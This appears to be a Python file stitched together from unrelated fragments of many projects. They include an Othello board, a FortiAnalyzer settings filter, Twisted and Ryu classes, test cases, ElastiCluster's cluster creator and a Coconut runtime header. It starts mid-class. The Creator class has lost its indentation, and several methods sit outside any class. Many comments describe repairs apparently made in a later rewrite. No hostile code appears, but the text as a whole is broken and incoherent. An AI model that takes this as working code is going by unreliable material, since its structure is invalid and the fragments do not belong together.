        """Merge all constructor adjacency dicts into the final DAG dict."""
        return self._merge_inputs(*self._args)
def filter_log_fortianalyzer_setting_data(json):
    """Project ``json`` onto the known log_fortianalyzer_setting options.

    Unknown keys and keys whose value is None are dropped; key order of
    the result follows the option list.
    """
    option_list = ['__change_ip', 'access_config', 'alt_server', 'certificate', 'certificate_verification', 'conn_timeout', 'enc_algorithm', 'fallback_to_primary', 'faz_type', 'hmac_algorithm', 'interface', 'interface_select_method', 'ips_archive', 'max_log_rate', 'mgmt_name', 'monitor_failure_retry_period', 'monitor_keepalive_period', 'preshared_key', 'priority', 'reliable', 'serial', 'server', 'source_ip', 'ssl_min_proto_version', 'status', 'upload_day', 'upload_interval', 'upload_option', 'upload_time']
    json = remove_invalid_fields(json)
    return {
        option: json[option]
        for option in option_list
        if option in json and json[option] is not None
    }
class Board():
    """8x8 Othello/Reversi board.

    Cell values are the module-level constants BLACK, WHITE and EMPTY;
    BLACK and WHITE are assumed to be numeric negations of each other
    (the opponent of ``bw`` is ``bw * -1``).  A threading.Lock guards
    board mutation so concurrent readers see a consistent grid.
    """

    def _reset(self):
        """Restore the standard starting position (two pieces per side)."""
        self._board = []
        self._lock = None
        for _ in range(8):
            self._board.append(([EMPTY] * 8))
        self._board[3][3] = self._board[4][4] = BLACK
        self._board[4][3] = self._board[3][4] = WHITE

    def __init__(self, p=None):
        """Create a starting board, or a deep copy of Board ``p``."""
        self._reset()
        self._lock = threading.Lock()
        if isinstance(p, Board):
            with p._lock:
                self._board = copy.deepcopy(p._board)
        elif (p is not None):
            # Fixed message typo ('invaid' -> 'invalid').
            raise ValueError('invalid parameter')

    def count(self, bwe):
        """Return how many cells hold ``bwe`` (BLACK, WHITE or EMPTY)."""
        assert (bwe in (BLACK, WHITE, EMPTY))
        n = 0
        with self._lock:
            for i in range(8):
                for j in range(8):
                    if (self._board[i][j] == bwe):
                        n += 1
        return n

    def _has_my_piece(self, bw, x, y, delta_x, delta_y):
        """Walk from (x, y) along (delta_x, delta_y); True when a ``bw``
        piece is reached before the edge or an empty cell."""
        assert (bw in (BLACK, WHITE))
        assert (delta_x in ((- 1), 0, 1))
        assert (delta_y in ((- 1), 0, 1))
        x += delta_x
        y += delta_y
        if ((x < 0) or (x > 7) or (y < 0) or (y > 7) or (self._board[x][y] == EMPTY)):
            return False
        if (self._board[x][y] == bw):
            return True
        return self._has_my_piece(bw, x, y, delta_x, delta_y)

    def reversible_directions(self, bw, x, y):
        """Return the direction deltas along which placing ``bw`` at
        (x, y) would capture opponent pieces (empty list = illegal move)."""
        assert (bw in (BLACK, WHITE))
        with self._lock:
            directions = []
            if (self._board[x][y] != EMPTY):
                return directions
            for d in itertools.product([(- 1), 1, 0], [(- 1), 1, 0]):
                if (d == (0, 0)):
                    continue
                nx = (x + d[0])
                ny = (y + d[1])
                # The immediate neighbour must be an opponent piece.
                if ((nx < 0) or (nx > 7) or (ny < 0) or (ny > 7) or (self._board[nx][ny] != (bw * (- 1)))):
                    continue
                # ...and one of our own pieces must close the line.
                if self._has_my_piece(bw, nx, ny, d[0], d[1]):
                    directions.append(d)
            return directions

    def _reverse_piece(self, bw, x, y, delta_x, delta_y):
        """Flip opponent pieces from (x, y) along the delta until one of
        our own pieces is reached. Caller must hold the lock."""
        assert (bw in (BLACK, WHITE))
        x += delta_x
        y += delta_y
        assert (self._board[x][y] in (BLACK, WHITE))
        if (self._board[x][y] == bw):
            return
        self._board[x][y] = bw
        return self._reverse_piece(bw, x, y, delta_x, delta_y)

    def put(self, x, y, bw):
        """Place a ``bw`` piece at (x, y), flipping captured pieces.

        Returns True when the move was legal and applied; False leaves
        the board untouched.
        """
        assert (bw in (BLACK, WHITE))
        directions = self.reversible_directions(bw, x, y)
        if (len(directions) == 0):
            return False
        # Mutate the grid entirely under the lock: the original wrote the
        # new piece before acquiring it, so concurrent readers could
        # observe a half-applied move.
        with self._lock:
            self._board[x][y] = bw
            for delta in directions:
                self._reverse_piece(bw, x, y, delta[0], delta[1])
        return True

    def isAllowed(self, x, y, bw):
        """True when ``bw`` may legally move at (x, y)."""
        return (len(self.reversible_directions(bw, x, y)) != 0)

    def _calc_score(self, bw, level):
        """Weighted score of ``bw`` minus the opponent, using the
        level-specific positional weight matrix."""
        assert (level in [1, 2]), (bw in (BLACK, WHITE))
        my_score = 0
        against_score = 0
        for i in range(8):
            for j in range(8):
                if (self._board[i][j] == bw):
                    my_score += _WEIGHT_MATRICES[level][i][j]
                elif (self._board[i][j] == (bw * (- 1))):
                    against_score += _WEIGHT_MATRICES[level][i][j]
        return (my_score - against_score)

    def find_best_position(self, bw, level):
        """Try every legal move on board copies and return one of the
        highest-scoring positions (random tie-break), or None."""
        assert (bw in (BLACK, WHITE))
        board_copy = Board(self)
        next_positions = {}
        for i in range(8):
            for j in range(8):
                board = Board(board_copy)
                if board.put(i, j, bw):
                    next_positions.setdefault(board._calc_score(bw, level), []).append((i, j))
        return (random.choice(next_positions[max(next_positions)]) if next_positions else None)

    def array(self):
        """Return a consistent snapshot of the grid as a list of lists."""
        return Board(self)._board
def _load_unittest_test_cases(import_module_names: List[str]) -> None:
    """Discover unittest.TestCase classes and re-register their test
    methods as TestSlide DSL examples (test/ftest/xtest prefixes map to
    example/fexample/xexample). Idempotent: runs once per process.
    """
    # Local import: test_result/setup_and_teardown below are used as
    # context managers and must be @contextmanager generators — without
    # the decorator every `with` here fails with AttributeError.
    from contextlib import contextmanager

    global _unittest_testcase_loaded
    if _unittest_testcase_loaded:
        return
    _unittest_testcase_loaded = True
    for test_case in _get_all_test_cases(import_module_names):
        test_method_names = [test_method_name for test_method_name in dir(test_case) if (test_method_name.startswith('test') or test_method_name.startswith('ftest') or test_method_name.startswith('xtest')) if callable(getattr(test_case, test_method_name))]
        if (not test_method_names):
            continue

        # NOTE(review): context_code closes over the loop variable
        # test_method_names; this is only safe if the DSL executes the
        # context body immediately at registration time — confirm.
        def get_context_code(test_case: unittest.TestCase) -> Callable[([testslide.dsl._DSLContext], None)]:
            def context_code(context: testslide.dsl._DSLContext) -> None:
                for test_method_name in test_method_names:
                    @contextmanager
                    def test_result() -> Iterator[_TestSlideTestResult]:
                        # Collect failures, then re-raise them in a form
                        # TestSlide understands after the example body.
                        result = _TestSlideTestResult()
                        (yield result)
                        result.aggregated_exceptions.raise_correct_exception()

                    @contextmanager
                    def setup_and_teardown() -> Iterator[None]:
                        test_case.setUpClass()
                        (yield)
                        test_case.tearDownClass()

                    def gen_example_code(test_method_name: str) -> Callable:
                        # Bind test_method_name per iteration (avoids the
                        # late-binding-closure pitfall).
                        def example_code(self: Any) -> None:
                            with test_result() as result:
                                with setup_and_teardown():
                                    test_case(methodName=test_method_name)(result=result)
                        return example_code

                    if test_method_name.startswith('test'):
                        context.example(test_method_name)(gen_example_code(test_method_name))
                    if test_method_name.startswith('ftest'):
                        context.fexample(test_method_name)(gen_example_code(test_method_name))
                    if test_method_name.startswith('xtest'):
                        context.xexample(test_method_name)(gen_example_code(test_method_name))
            return context_code

        testslide.dsl.context('{}.{}'.format(test_case.__module__, test_case.__name__))(get_context_code(test_case))
class ConflictPredictionMetric(Metric[ConflictPredictionMetricResults]):
    """Measures prediction instability: rows whose feature values duplicate
    another row's but whose prediction does not."""

    @staticmethod
    def _unstable_prediction_stats(df, feature_columns, prediction_columns):
        """Return (count, share) of feature-duplicated rows in ``df`` whose
        prediction is not duplicated along with the features."""
        feature_dups = df[df.duplicated(subset=feature_columns, keep=False)]
        # Rows duplicated on features AND prediction are "stable"; they are
        # a subset of feature_dups, so drop() is always label-safe.
        stable_idx = df[df.duplicated(subset=(feature_columns + prediction_columns), keep=False)].index
        number = feature_dups.drop(stable_idx).shape[0]
        share = round((number / df.shape[0]), 3)
        return (number, share)

    def calculate(self, data: InputData) -> ConflictPredictionMetricResults:
        """Compute instability stats for current data and, when present,
        reference data.

        :raises ValueError: when the prediction column or features are
            missing, or the prediction spec has an unexpected type.
        """
        dataset_columns = process_columns(data.current_data, data.column_mapping)
        prediction_name = dataset_columns.utility_columns.prediction
        if (prediction_name is None):
            raise ValueError('The prediction column should be presented')
        columns = dataset_columns.get_all_features_list()
        if (len(columns) == 0):
            raise ValueError('Prediction conflict is not defined. No features provided')
        if isinstance(prediction_name, str):
            prediction_columns = [prediction_name]
        elif isinstance(prediction_name, list):
            prediction_columns = prediction_name
        else:
            # The original fell through with prediction_columns unbound,
            # turning an unexpected spec into a confusing NameError.
            raise ValueError('The prediction column should be a string or a list')
        (number_not_stable_prediction, share_not_stable_prediction) = self._unstable_prediction_stats(data.current_data, columns, prediction_columns)
        reference = None
        if (data.reference_data is not None):
            (number_ref, share_ref) = self._unstable_prediction_stats(data.reference_data, columns, prediction_columns)
            reference = ConflictPredictionData(number_not_stable_prediction=number_ref, share_not_stable_prediction=share_ref)
        return ConflictPredictionMetricResults(current=ConflictPredictionData(number_not_stable_prediction=number_not_stable_prediction, share_not_stable_prediction=share_not_stable_prediction), reference=reference)
class TestInlineHiliteGuessInline(util.MdCase):
    """With highlight guess_lang='inline', only inline code spans get
    language guessing; fenced blocks must stay un-highlighted."""

    # Extensions/configs applied to every check_markdown call in this case.
    extension = ['pymdownx.highlight', 'pymdownx.inlinehilite', 'pymdownx.superfences']
    extension_configs = {'pymdownx.highlight': {'guess_lang': 'inline'}, 'pymdownx.inlinehilite': {'css_class': 'inlinehilite', 'style_plain_text': True}}

    def test_guessing_inline(self):
        """Inline span is guessed as Python and tokenized."""
        self.check_markdown('`import module`.', '<p><code class="inlinehilite"><span class="kn">import</span> <span class="nn">module</span></code>.</p>')

    def test_no_guessing_block(self):
        """Fenced block without a language stays plain (no guessing)."""
        self.check_markdown('\n    ```\n    <!DOCTYPE html>\n    <html>\n    <body>\n    <h1>My great test</h1>\n    <p>Thou shalt be re-educated through labour should this test ever fails.</p>\n    </body>\n    </html>\n    ```\n    ', '\n    <div class="highlight"><pre><span></span><code><!DOCTYPE html>\n    <html>\n    <body>\n    <h1>My great test</h1>\n    <p>Thou shalt be re-educated through labour should this test ever fails.</p>\n    </body>\n    </html>\n    </code></pre></div>\n    ', True)
class ExtendedLoopingCall(LoopingCall):
    """Twisted LoopingCall variant adding a one-off start delay, a
    persistent call counter and a force-fire method."""

    # Delay (seconds) used for the first interval only; cleared after the
    # first fire.
    start_delay = None
    # Number of times the task has fired; can be seeded via count_start.
    callcount = 0

    def start(self, interval, now=True, start_delay=None, count_start=0):
        """Start the loop.

        :param interval: seconds between calls (must be >= 0)
        :param now: fire immediately instead of waiting one interval
        :param start_delay: optional custom delay before the first call
        :param count_start: initial value for the call counter
        :return: Deferred fired when the loop stops or errs
        """
        assert (not self.running), 'Tried to start an already running ExtendedLoopingCall.'
        if (interval < 0):
            raise ValueError('interval must be >= 0')
        self.running = True
        deferred = self._deferred = Deferred()
        self.starttime = self.clock.seconds()
        self.interval = interval
        self._runAtStart = now
        self.callcount = max(0, count_start)
        # Negative delays are clamped to 0; None stays None (inactive).
        self.start_delay = (start_delay if (start_delay is None) else max(0, start_delay))
        if now:
            self()
        elif ((start_delay is not None) and (start_delay >= 0)):
            # Schedule the first call using start_delay, then restore the
            # real interval for all subsequent calls.
            (real_interval, self.interval) = (self.interval, start_delay)
            self._scheduleFrom(self.starttime)
            self.interval = real_interval
        else:
            self._scheduleFrom(self.starttime)
        return deferred

    def __call__(self):
        """Fire the task once, bumping the counter and consuming the
        one-off start delay."""
        self.callcount += 1
        if self.start_delay:
            # First fire after a delayed start: reset the reference time so
            # subsequent scheduling uses the regular interval.
            self.start_delay = None
            self.starttime = self.clock.seconds()
        if self._deferred:
            LoopingCall.__call__(self)

    def force_repeat(self):
        """Cancel the pending call and fire immediately, restarting the
        interval clock from now."""
        assert self.running, 'Tried to fire an ExtendedLoopingCall that was not running.'
        self.call.cancel()
        self.call = None
        self.starttime = self.clock.seconds()
        self()

    def next_call_time(self):
        """Seconds until the next scheduled fire, or None when the loop is
        stopped or the interval is 0.

        NOTE(review): mixes start_delay and interval (`interval` holds the
        delay while the remainder uses self.interval) — presumably
        intentional for the delayed first call; confirm.
        """
        if (self.running and (self.interval > 0)):
            total_runtime = (self.clock.seconds() - self.starttime)
            interval = (self.start_delay or self.interval)
            return max(0, (interval - (total_runtime % self.interval)))
# Registration must be applied as a decorator: a bare call here would
# discard the wrapped class and never register OFPAT_METER, leaving
# self.type/self.len unset for serialize().
@_action_type(ofproto.OFPAT_METER, ofproto.OFP_ACTION_METER_SIZE)
class OFPActionMeter(OFPAction):
    """Meter action (OFPAT_METER): sends matching packets to ``meter_id``."""

    def __init__(self, meter_id, type_=None, len_=None):
        # type_/len_ are accepted for parser symmetry but ignored; the
        # registration supplies self.type/self.len via the base class.
        super(OFPActionMeter, self).__init__()
        self.meter_id = meter_id

    @classmethod
    def parser(cls, buf, offset):
        """Deserialize an OFPActionMeter from ``buf`` at ``offset``.

        Declared @classmethod: the framework calls it as cls.parser(buf,
        offset); as a plain method the buffer would bind to ``cls``.
        """
        (type_, len_, meter_id) = struct.unpack_from(ofproto.OFP_ACTION_METER_PACK_STR, buf, offset)
        return cls(meter_id)

    def serialize(self, buf, offset):
        """Pack this action into ``buf`` at ``offset``."""
        msg_pack_into(ofproto.OFP_ACTION_METER_PACK_STR, buf, offset, self.type, self.len, self.meter_id)
def run_cmd(cmd, show_output=True, raise_errs=True, **kwargs):
    """Run *cmd* (a non-empty argument list) as a subprocess.

    With show_output the child's output goes to the console and the exit
    status is returned (check_call semantics when raise_errs). Without it
    the combined stdout+stderr is captured and returned, raising
    CalledProcessError on failure when raise_errs. An OSError while
    launching is logged and mapped to a CalledProcessError, the
    oserror_retcode, or '' depending on the flags.
    """
    internal_assert((cmd and isinstance(cmd, list)), 'console commands must be passed as non-empty lists')
    # Resolve the executable against PATH where shutil.which exists.
    if hasattr(shutil, 'which'):
        cmd[0] = shutil.which(cmd[0]) or cmd[0]
    logger.log_cmd(cmd)
    try:
        if show_output:
            runner = subprocess.check_call if raise_errs else subprocess.call
            return runner(cmd, **kwargs)
        stdout, stderr, retcode = call_output(cmd, **kwargs)
        combined = stdout + stderr
        if retcode and raise_errs:
            raise subprocess.CalledProcessError(retcode, cmd, output=combined)
        return combined
    except OSError:
        logger.log_exc()
        if raise_errs:
            raise subprocess.CalledProcessError(oserror_retcode, cmd)
        return oserror_retcode if show_output else ''
class MonitorManager():
    """Owns the set of system monitors and fans requests out to them."""

    def __init__(self, requested_monitors):
        self.initiate_monitors(requested_monitors)

    def initiate_monitors(self, additional_monitors):
        """Build the always-on monitors plus any requested extras."""
        logging.info('initiating monitors: [%s]', ','.join(additional_monitors))
        self.memorymap_monitor = MemorymapMonitor()
        self.modules_monitor = ModulesMonitor()
        self.monitors = [self.memorymap_monitor, self.modules_monitor]
        for switch in additional_monitors:
            if (switch == 'dummy'):
                # NOTE(review): appends None, which the monitor.* calls in
                # track_changes / collect_* below would crash on —
                # presumably a deliberate test hook; confirm intent.
                self.monitors.append(None)

    def track_changes(self, interval):
        """Ask every monitor to record changes every ``interval``."""
        for monitor in self.monitors:
            monitor.track_changes(interval)

    def get_memory_map_changes(self):
        return self.memorymap_monitor.get_memory_map_changes()

    def get_modules(self):
        return self.modules_monitor.get_modules()

    def collect_observations(self):
        """Gather first/latest snapshots and latest changes, one entry per
        monitor, in monitor order."""
        observations = {'first_snapshot': [], 'latest_snapshot': [], 'latest_changes': []}
        for monitor in self.monitors:
            observations['first_snapshot'].append(monitor.get_first_snapshot())
            observations['latest_snapshot'].append(monitor.get_latest_snapshot())
            observations['latest_changes'].append(monitor.get_latest_changes())
        return observations

    def collect_stats(self):
        """Gather a change summary from each monitor."""
        stats = {'changes': []}
        for monitor in self.monitors:
            stats['changes'].append(monitor.get_change_summary())
        return stats
def extractGstranslationWordpressCom(item):
    """Build a release message for a gstranslation.wordpress.com item.

    Returns None for previews or items without volume/chapter info, a
    release message for recognised tags, and False otherwise.
    """
    title = item['title']
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(title)
    if not (chp or vol) or 'preview' in title.lower():
        return None
    known_tags = (
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    )
    for tag, series_name, tl_type in known_tags:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_sine_wave(wave: WaveformGenerator, scope: Oscilloscope):
    """Generate a 500 Hz sine on SI1, capture it on the scope, and verify
    amplitude/frequency and goodness of fit via least squares."""
    frequency = 500
    wave.load_function('SI1', 'sine')
    wave.generate('SI1', frequency)
    # Let the output settle before capturing.
    time.sleep(0.1)
    (x, y) = scope.capture(1, 10000, 1, trigger=0)

    def expected_f(x, amplitude, frequency, phase):
        # Model fitted to the captured waveform.
        return (amplitude * np.sin(((((2 * np.pi) * frequency) * x) + phase)))

    amplitude = 3.3
    guess = [amplitude, frequency, 0]
    # Capture timestamps are in microseconds; convert to seconds for Hz.
    ([amplitude_est, frequency_est, phase_est], _) = curve_fit(expected_f, (x * MICROSECONDS), y, guess)
    assert (amplitude_est == pytest.approx(amplitude, rel=RELTOL))
    assert (frequency_est == pytest.approx(frequency, rel=RELTOL))
    coeff_of_det = r_squared(y, expected_f((x * MICROSECONDS), amplitude_est, frequency_est, phase_est))
    assert (coeff_of_det >= GOOD_FIT)
# Restored as pytest decorators: as bare expressions the skipif line was
# not even valid syntax (keyword argument inside a parenthesised tuple)
# and the test was never parametrized.
@pytest.mark.skipif(sys.platform == 'win32', reason='does not run on windows')
@pytest.mark.parametrize('shell,script,comp_func', [('bash', 'tests/scripts/test_bash_install_uninstall.sh', 'hydra_bash_completion'), ('fish', 'tests/scripts/test_fish_install_uninstall.fish', 'hydra_fish_completion')])
def test_install_uninstall(shell: str, script: str, comp_func: str) -> None:
    """Run the shell-specific completion install/uninstall smoke script."""
    if ((shell == 'fish') and (not is_fish_supported())):
        skip('fish is not installed or the version is too old')
    cmd = [shell, script, 'python hydra/test_utils/completion.py', comp_func]
    # Minimal environment: only PATH, so the script cannot leak state.
    subprocess.check_call(cmd, env={'PATH': os.environ['PATH']})
class OptionPlotoptionsFunnel3dTooltip(Options):
    """Tooltip options for funnel3d plots.

    Each option is a property pair: the getter reads the configured value
    (falling back to the Highcharts default), the setter stores it. The
    decorators are required — without them each duplicate ``def`` simply
    shadowed its getter, making every option write-only.
    """

    @property
    def clusterFormat(self):
        return self._config_get('Clustered points: {point.clusterPointsAmount}')

    @clusterFormat.setter
    def clusterFormat(self, text: str):
        self._config(text, js_type=False)

    @property
    def dateTimeLabelFormats(self) -> 'OptionPlotoptionsFunnel3dTooltipDatetimelabelformats':
        """Sub-options object for datetime label formats (getter only)."""
        return self._config_sub_data('dateTimeLabelFormats', OptionPlotoptionsFunnel3dTooltipDatetimelabelformats)

    @property
    def distance(self):
        return self._config_get(6)

    @distance.setter
    def distance(self, num: float):
        self._config(num, js_type=False)

    @property
    def followPointer(self):
        return self._config_get(False)

    @followPointer.setter
    def followPointer(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def followTouchMove(self):
        return self._config_get(True)

    @followTouchMove.setter
    def followTouchMove(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def footerFormat(self):
        return self._config_get('')

    @footerFormat.setter
    def footerFormat(self, text: str):
        self._config(text, js_type=False)

    @property
    def format(self):
        return self._config_get('undefined')

    @format.setter
    def format(self, text: str):
        self._config(text, js_type=False)

    @property
    def headerFormat(self):
        return self._config_get(None)

    @headerFormat.setter
    def headerFormat(self, text: str):
        self._config(text, js_type=False)

    @property
    def nullFormat(self):
        return self._config_get(None)

    @nullFormat.setter
    def nullFormat(self, text: str):
        self._config(text, js_type=False)

    @property
    def nullFormatter(self):
        return self._config_get(None)

    @nullFormatter.setter
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def pointFormat(self):
        return self._config_get(None)

    @pointFormat.setter
    def pointFormat(self, text: str):
        self._config(text, js_type=False)

    @property
    def pointFormatter(self):
        return self._config_get(None)

    @pointFormatter.setter
    def pointFormatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def valueDecimals(self):
        return self._config_get(None)

    @valueDecimals.setter
    def valueDecimals(self, num: float):
        self._config(num, js_type=False)

    @property
    def valuePrefix(self):
        return self._config_get(None)

    @valuePrefix.setter
    def valuePrefix(self, text: str):
        self._config(text, js_type=False)

    @property
    def valueSuffix(self):
        return self._config_get(None)

    @valueSuffix.setter
    def valueSuffix(self, text: str):
        self._config(text, js_type=False)

    @property
    def xDateFormat(self):
        return self._config_get(None)

    @xDateFormat.setter
    def xDateFormat(self, text: str):
        self._config(text, js_type=False)
class TestPutSettings():
    """PutSettings runner must forward its body to cluster.put_settings."""

    # Restored decorators: as bare expressions (`('elasticsearch...')`,
    # `.asyncio`) the mock was never injected and the coroutine never
    # awaited by the test runner.
    @mock.patch('elasticsearch.Elasticsearch')
    @pytest.mark.asyncio
    async def test_put_settings(self, es):
        es.cluster.put_settings = mock.AsyncMock()
        params = {'body': {'transient': {'indices.recovery.max_bytes_per_sec': '20mb'}}}
        r = runner.PutSettings()
        (await r(es, params))
        es.cluster.put_settings.assert_awaited_once_with(body={'transient': {'indices.recovery.max_bytes_per_sec': '20mb'}})
class Creator(object):
DEFAULT_STORAGE_PATH = os.path.expanduser('~/.elasticluster/storage')
DEFAULT_STORAGE_TYPE = 'yaml'
def __init__(self, conf, storage_path=None, storage_type=None):
self.cluster_conf = conf['cluster']
self.storage_path = (os.path.expandvars(os.path.expanduser(storage_path)) if storage_path else self.DEFAULT_STORAGE_PATH)
self.storage_type = (storage_type or self.DEFAULT_STORAGE_TYPE)
def load_cluster(self, cluster_name):
repository = self.create_repository()
cluster = repository.get(cluster_name)
cluster._setup_provider = self.create_setup_provider(cluster.template)
cluster.cloud_provider = self.create_cloud_provider(cluster.template)
cluster.update_config(self.cluster_conf[cluster.template])
return cluster
def create_cloud_provider(self, cluster_template):
try:
conf_template = self.cluster_conf[cluster_template]
except KeyError:
raise ConfigurationError('No cluster template `{0}` found in configuration file'.format(cluster_template))
try:
cloud_conf = conf_template['cloud']
except KeyError:
raise ConfigurationError('No cloud section for cluster template `{0}` found in configuration file'.format(cluster_template))
try:
provider = cloud_conf['provider']
except KeyError:
raise ConfigurationError('No `provider` configuration defined in cloud section `{0}` of cluster template `{1}`'.format(cloud_conf.get('name', '***'), cluster_template))
try:
ctor = _get_provider(provider, CLOUD_PROVIDERS)
except KeyError:
raise ConfigurationError('Unknown cloud provider `{0}` for cluster `{1}`'.format(provider, cluster_template))
except (ImportError, AttributeError) as err:
raise RuntimeError('Unable to load cloud provider `{0}`: {1}: {2}'.format(provider, err.__class__.__name__, err))
provider_conf = cloud_conf.copy()
provider_conf.pop('provider')
provider_conf['storage_path'] = self.storage_path
try:
return ctor(**provider_conf)
except TypeError:
import inspect
(args, varargs, keywords, defaults) = inspect.getargspec(ctor.__init__)
if (defaults is not None):
defaulted = dict(((argname, value) for (argname, value) in zip(reversed(args), reversed(defaults))))
else:
defaulted = {}
for argname in args[1:]:
if ((argname not in provider_conf) and (argname not in defaulted)):
raise ConfigurationError('Missing required configuration parameter `{0}` in cloud section for cluster `{1}`'.format(argname, cluster_template))
def create_cluster(self, template, name=None, cloud=None, setup=None):
if (template not in self.cluster_conf):
raise ConfigurationError('No cluster template configuration by the name `{template}`'.format(template=template))
conf = self.cluster_conf[template]
extra = conf.copy()
extra.pop('cloud')
extra.pop('nodes')
extra.pop('setup')
extra['template'] = template
if (cloud is None):
cloud = self.create_cloud_provider(template)
if (name is None):
name = template
if (setup is None):
setup = self.create_setup_provider(template, name=name)
cluster = Cluster(name=(name or template), cloud_provider=cloud, setup_provider=setup, user_key_name=conf['login']['user_key_name'], user_key_public=conf['login']['user_key_public'], user_key_private=conf['login']['user_key_private'], repository=self.create_repository(), **extra)
nodes = conf['nodes']
for group_name in nodes:
group_conf = nodes[group_name]
for varname in ['image_user', 'image_userdata']:
group_conf.setdefault(varname, conf['login'][varname])
cluster.add_nodes(group_name, **group_conf)
return cluster
def create_setup_provider(self, cluster_template, name=None):
    """Build the setup provider configured for *cluster_template*.

    Collects Ansible group names and `*_var_`-prefixed environment
    variables from the template configuration and instantiates the
    registered setup provider with them.

    :raises ConfigurationError: when the template, its `setup` section,
        or the configured provider name is invalid.
    """
    try:
        conf_template = self.cluster_conf[cluster_template]
    except KeyError:
        raise ConfigurationError(
            'No cluster template `{0}` found in configuration file'.format(cluster_template))
    try:
        conf = conf_template['setup']
    except KeyError:
        raise ConfigurationError(
            'No setup section for cluster template `{0}` found in configuration file'.format(cluster_template))
    if name:
        conf['cluster_name'] = name
    conf_login = self.cluster_conf[cluster_template]['login']
    provider_name = conf.get('provider', 'ansible')
    if provider_name not in SETUP_PROVIDERS:
        raise ConfigurationError(
            'Invalid value `%s` for `setup_provider` in configuration file.' % provider_name)
    provider = _get_provider(provider_name, SETUP_PROVIDERS)
    playbook_path = conf.pop('playbook_path', None)
    groups = self._read_node_groups(conf)
    # Keys named `<kind>_var_<x>` or `global_var_<x>` become per-kind
    # environment variables for the setup provider.
    candidate_items = list(conf.items()) + list(self.cluster_conf[cluster_template].items())
    environment_vars = {}
    for node_kind, grps in groups.items():
        if not isinstance(grps, list):
            groups[node_kind] = [grps]
        kind_vars = environment_vars.setdefault(node_kind, {})
        for key, value in candidate_items:
            for prefix in (node_kind + '_var_', 'global_var_'):
                if key.startswith(prefix):
                    var = key.replace(prefix, '')
                    kind_vars[var] = value
                    log.debug('setting variable %s=%s for node kind %s', var, value, node_kind)
    return provider(groups,
                    playbook_path=playbook_path,
                    environment_vars=environment_vars,
                    storage_path=self.storage_path,
                    sudo=conf_login['image_sudo'],
                    sudo_user=conf_login['image_user_sudo'],
                    **conf)
def _read_node_groups(self, conf):
    """Map each node kind to its list of Ansible group names.

    Reads every ``<kind>_groups`` key of *conf* and splits its
    comma-separated value; legacy group names are translated via
    `_RENAMED_NODE_GROUPS` with a `DeprecationWarning`.
    """
    result = defaultdict(list)
    for key, value in conf.items():
        if not key.endswith('_groups'):
            continue
        node_kind = key[:-len('_groups')]
        for raw_name in value.split(','):
            group_name = raw_name.strip()
            if not group_name:
                continue
            if group_name in self._RENAMED_NODE_GROUPS:
                old_group_name = group_name
                group_name, remove_at = self._RENAMED_NODE_GROUPS[group_name]
                warn('Group `{0}` was renamed to `{1}`; please fix your configuration file. Support for automatically renaming this group will be removed in {2}.'.format(old_group_name, group_name, ('ElastiCluster {0}'.format(remove_at) if remove_at else 'a future version of ElastiCluster')), DeprecationWarning)
            result[node_kind].append(group_name)
    return result
# Legacy node-group names mapped to (new_name, version_in_which_the_alias_is_removed);
# used by `_read_node_groups` to translate old configuration files.
_RENAMED_NODE_GROUPS = {'condor_workers': ('condor_worker', '1.4'), 'gluster_client': ('glusterfs_client', '1.4'), 'gluster_data': ('glusterfs_server', '1.4'), 'gridengine_clients': ('gridengine_worker', '2.0'), 'maui_master': ('torque_master', '2.0'), 'pbs_clients': ('torque_worker', '2.0'), 'pbs_master': ('torque_master', '2.0'), 'slurm_clients': ('slurm_worker', '2.0'), 'slurm_workers': ('slurm_worker', '1.4')}
def create_repository(self):
    """Return the on-disk repository used to persist cluster state."""
    return MultiDiskRepository(self.storage_path, self.storage_type)
def fewshot_cfg_string():
    """Return a spacy-llm pipeline config (few-shot SpanCat task) as a string.

    BUG FIX: the registry keys in this config were mangled in this file
    (`_tasks`, a bare `=`, `_models`); restored to the spacy-llm registry
    entries `@llm_tasks`, `@misc` and `@llm_models` so the config parses.
    The examples file is resolved relative to this test module.
    """
    return f'''
[nlp]
lang = "en"
pipeline = ["llm"]
batch_size = 128
[components]
[components.llm]
factory = "llm"
[components.llm.task]
@llm_tasks = "spacy.SpanCat.v2"
labels = ["PER", "ORG", "LOC"]
[components.llm.task.examples]
@misc = "spacy.FewShotReader.v1"
path = {str(((Path(__file__).parent / 'examples') / 'ner.yml'))}
[components.llm.task.normalizer]
@misc = "spacy.LowercaseNormalizer.v1"
[components.llm.model]
@llm_models = "spacy.GPT-3-5.v1"
'''
class _coconut(object):
    """Runtime namespace for compiled Coconut code.

    Bundles the stdlib modules the generated code relies on, plus
    version-compatibility shims (lru_cache/asyncio/pickle backports and a
    `typing` stand-in built from typing_extensions where available).
    NOTE(review): this is generated header code; indentation here is
    reconstructed from the flattened source.
    """
    import collections, copy, functools, types, itertools, operator, threading, os, warnings, contextlib, traceback, weakref, multiprocessing, inspect
    from multiprocessing import dummy as multiprocessing_dummy
    # functools.lru_cache backport for Python < 3.2.
    if (_coconut_sys.version_info < (3, 2)):
        try:
            from backports.functools_lru_cache import lru_cache
            functools.lru_cache = lru_cache
        except ImportError as lru_cache_import_err:
            functools.lru_cache = _coconut_missing_module(lru_cache_import_err)
    if (_coconut_sys.version_info < (3,)):
        import copy_reg as copyreg
    else:
        import copyreg
    # asyncio, or the `trollius` backport (with an error-raising stub when
    # trollius is missing) for Python < 3.4.
    if (_coconut_sys.version_info < (3, 4)):
        try:
            import trollius as asyncio
        except ImportError as trollius_import_err:
            class you_need_to_install_trollius(_coconut_missing_module):
                __slots__ = ()
                def coroutine(self, func):
                    def raise_import_error(*args, **kwargs):
                        raise self._import_err
                    return raise_import_error
                def Return(self, obj):
                    raise self._import_err
            asyncio = you_need_to_install_trollius(trollius_import_err)
        asyncio_Return = asyncio.Return
    else:
        import asyncio
        asyncio_Return = StopIteration
    try:
        import async_generator
    except ImportError as async_generator_import_err:
        async_generator = _coconut_missing_module(async_generator_import_err)
    if (_coconut_sys.version_info < (3,)):
        import cPickle as pickle
    else:
        import pickle
    OrderedDict = (collections.OrderedDict if (_coconut_sys.version_info >= (2, 7)) else dict)
